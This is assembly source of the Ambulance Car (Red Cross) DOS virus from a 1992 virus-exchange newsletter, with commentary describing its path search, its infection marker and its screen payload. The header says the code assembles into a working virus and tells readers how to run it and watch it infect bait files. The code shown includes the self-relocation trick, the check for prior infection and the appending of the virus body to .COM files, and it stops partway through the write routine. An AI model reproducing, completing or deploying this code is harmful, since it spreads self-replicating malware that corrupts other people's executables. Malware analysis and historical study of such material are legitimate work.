;REDCROSS/AMBULANCE CAR VIRUS for Crypt Newsletter #10, edited by Urnst Kouch
;December 1992
;Originally supplied as a Sourcer disassembly in a Scandinavian virus mag
;published by "Youth Against McAfee (YAM)", this AMBULANCE specimen was
;generated in its raw form by "Natas Kaupas." Hold that up to your mirror
;and it spells Satan. Whatever, "Natas/Satan" has also supplied us with the
;MINDLESS/FamR series of viruses for you trivia buffs. The Crypt Newsletter
;is obliged to him, wherever he is, for these interesting programs.
;
;In any case, while helpful, the original disassembly had diminished
;value, being completely uncommented. It did, however, assemble
;under TASM into an actual working copy of the virus, which
;appears to be the AMBULANCE CAR B strain.
;
;
;Ambulance Car remains an interesting virus, packed with enough features
;so that it can still find its target files, .COM executables, wherever
;they might be lurking on a system.
;
;Principally, this revolves around the virus searching the path string set
;in the environment. If no path exists, the virus defaults to the
;current directory. In both cases, the virus may infect up to two files
;anywhere on the path per pass. Most times it will infect only one.
;Sometimes it will not budge at all.
;
;Once it has found a file, Ambulance reads the first three bytes and checks
;for an 0E9h (jmp near) opcode at the start. If it is absent, the virus
;assumes the file is uninfected and proceeds straight to infection. If it is
;present, the virus follows that jump to its target, reads six bytes there and
;compares them with the first six bytes of its own body. Only an exact match
;spares the file; a coincidental 0E9h with a different sequence is infected
;anyway.
;
;Randomly, the virus will activate and run the Ambulance across the bottom
;of your screen after a round of infection. Because of the path search
;Ambulance can easily find .COM executables on a sizeable disk at a time
;when there are fewer and fewer of these to be seen. Unfortunately for a
;direct-action virus, the disk activity caused by the path search is
;noticeable -- with two caveats: on a fast machine it may not be, and an
;average user may not pay attention to it anyway. You never know how a
;user will react when dealing with viruses.
;
;You can easily experiment with this version by commenting out the PATH
;statement in your AUTOEXEC.BAT. With no PATH the search falls back to the
;current directory (see above), which confines the virus to a test directory
;where it can infect bait files until the Ambulance effect is seen. Do this
;only on an isolated, disposable machine: the confinement depends entirely on
;the PATH being absent, not on any safeguard in the code.
;
;Ambulance Car is detected by "rules-based" anti-virus sentries like
;PCRx (reviewed in this issue), but keep in mind this type of
;protection is not flawless. Accidents can happen. Most current scanners
;easily detect this variant of Ambulance, although
;some cannot disinfect files once they are parasitized.
; Constant names below were produced by the Sourcer disassembly. The data_*e
; values are not referenced anywhere in the visible part of this file, so
; their meaning cannot be stated here.
data_1e equ 0Ch
data_2e equ 49h
data_3e equ 6Ch
; By the DOS PSP layout, offset 2Ch holds the environment segment. The header
; says the virus scans PATH from the environment, so this is presumably what
; loadpath reads -- loadpath itself is outside this view; confirm there.
psp_envirn_seg equ 2Ch
data_21e equ 0C80h
; Single segment, .COM layout: CS=DS, and org 100h places `start` at the
; normal .COM entry point (PSP+100h).
virus segment byte public
assume cs:virus, ds:virus
org 100h
;-----------------------------------------------------------------------------
; redcross -- entry point and main flow of the Ambulance Car (B) virus body.
;
; Layout (org 100h): `start` is a 2-byte short jump to `virstart`, followed by
; what decodes as a small carrier stub (a greeting string and a DOS
; print-and-exit sequence, see the byte-level notes below). The virus proper
; begins at `virstart`.
;
; Register convention for the whole file: SI is the relocation delta such that
; SI+100h is the run-time address of `virstart`. Every `[si+NNNh]` and
; `data_N[si]` reference in this file is relative to that base, which is how
; the same code runs wherever it has been appended to a host.
;
; The six bytes starting at `virstart` (E8 01 00 01 5E 81) double as the
; infection marker that check_infect compares against a candidate file.
;
; 16-bit TASM, MS-DOS only. This is live malware: build and run it only on an
; isolated, disposable test machine.
;-----------------------------------------------------------------------------
redcross proc far ; main flow: infect, maybe trigger payload, run host
start:
jmp short virstart ; EBh xx: 2-byte jump over the carrier stub below
; ---- carrier stub, decoded from the raw bytes (not virus code) ----
data_5 dw 4890h ; bytes 90h,48h: NOP pad, then 'H' -- start of the message
data_7 dw 6C65h ; bytes 65h,6Ch: 'e','l'
db 6Ch, 6Fh, 20h, 2Dh, 20h ; "lo - "  -> message reads "Hello - Copyright ..."
copyright db 'Copyright S & S Enterprises, 198' ; decoy notice naming S&S
db '8' ; (Solomon's company); not an indicator of origin
db 0Ah, 0Dh, 24h, 1Ah,0B4h, 09h ; LF CR '$' (DOS string end), 1Ah EOF, then B4 09 = mov ah,9
db 0BAh, 03h, 01h,0CDh, 21h,0CDh ; BA 03 01 = mov dx,103h; CD 21 = int 21h (print the message)
db 20h ; completes CD 20 = int 20h (terminate)
; ---- virus body starts here ----
virstart:
; Delta-offset ("get my address") trick, hand-encoded so that a disassembler
; shows nonsense for the next three lines. The real byte stream is:
;   E8 01 00        call $+4      ; pushes the address of the 01h byte, skips it
;   01 5E 81 EE 03 01
;      5E           pop  si       ; si = run-time address of that 01h byte
;      81 EE 03 01  sub  si,103h  ; minus its assembled address -> si+100h = virstart
; The three "instructions" shown below are never executed as written.
db 0E8h, 01h, 00h
add [bp-7Fh],bx ; encodes 01 5E 81: 01h skipped, 5Eh = pop si, 81h opens sub si,imm16
out dx,al ; encodes EEh: the ModRM byte of sub si,imm16 -- NOT a port write
add ax,[bx+di] ; encodes 03 01: the imm16 0103h
call check_infect ; first pass: PATH search, infect one file if found
call check_infect ; second pass: same routine; often finds nothing more
call sound_fury ; decide (randomly, per the header) whether to run the screen payload
; Hand control back to the host. The body written into a file is 319h bytes
; from virstart (see the write in check_infect), so virstart+319h = [si+419h]
; lies just past it; presumably it holds the host's original first three
; bytes, set up during infection (that code is not in this view -- confirm).
lea bx,[si+419h] ; source: 3 saved bytes just past the body
mov di,100h ; destination: the .COM entry point
mov al,[bx]
mov [di],al ; restore byte 0
mov ax,[bx+1]
mov [di+1],ax ; restore bytes 1..2
jmp di ; run the host from its restored entry point (100h)
exit:
retn ; shared early-out target: check_infect jumps here, so this pops
; check_infect's own return address and returns to its caller
redcross endp
;*****************************************************************************
; SUBROUTINE
;*****************************************************************************
check_infect proc near ; path search for Ambulance
call loadpath ; Car
mov al,byte ptr data_19[si]
or al,al
jz exit ; No path/no files? Git!
lea bx,[si+40Fh]
inc word ptr [bx]
lea dx,[si+428h] ; load effective address
mov ax,3D02h
int 21h ; open found file by loadpath read/write
; with handle
mov word ptr ds:[417h][si],ax ;ax contains handle
mov bx,word ptr ds:[417h][si]
mov cx,3
lea dx,[si+414h] ; load address of buffer
mov ah,3Fh ; to read first three bytes into.
int 21h ; Read the bytes . . .
; bx points to file handle.
;
mov al,byte ptr ds:[414h][si]
cmp al,0E9h ; compare with 0E9h
jne infect ; if not equal, assume virus not here - infect
mov dx,word ptr ds:[415h][si]
mov bx,word ptr ds:[417h][si]
add dx,3
xor cx,cx ; zero register
mov ax,4200h
int 21h ; point to beginning of file, again
; bx contains the handle
mov bx,word ptr ds:[417h][si]
mov cx,6
lea dx,[si+41Ch] ; load effective address
mov ah,3Fh ; and read the first 6 bytes
int 21h ; this time
; ds:dx points to buffer
mov ax,data_13[si]
mov bx,data_14[si]
mov cx,data_15[si]
cmp ax,word ptr ds:[100h][si] ; compare with data copied above
jne infect ; jump if not equal to infect
cmp bx,data_5[si]
jne infect ; jump if not equal
cmp cx,data_7[si]
je close ; finally, if we get a match we know
infect: ; we're here, so go to close up
mov bx,word ptr ds:[417h][si]
xor cx,cx ; zero register
xor dx,dx ; zero register
mov ax,4202h
int 21h ; reset pointer to end of file
; bx contains file handle
sub ax,3
mov word ptr ds:[412h][si],ax
mov bx,word ptr ds:[417h][si]
mov ax,5700h ; bx points to name of file
int 21h ; get file date and time
; time returns in cx, date in dx
push cx ; push these onto the stack
push dx ; we'll need 'em later
mov bx,word ptr ds:[417h][si]
mov cx,319h
lea dx,[si+100h]
mov ah,40h ; write th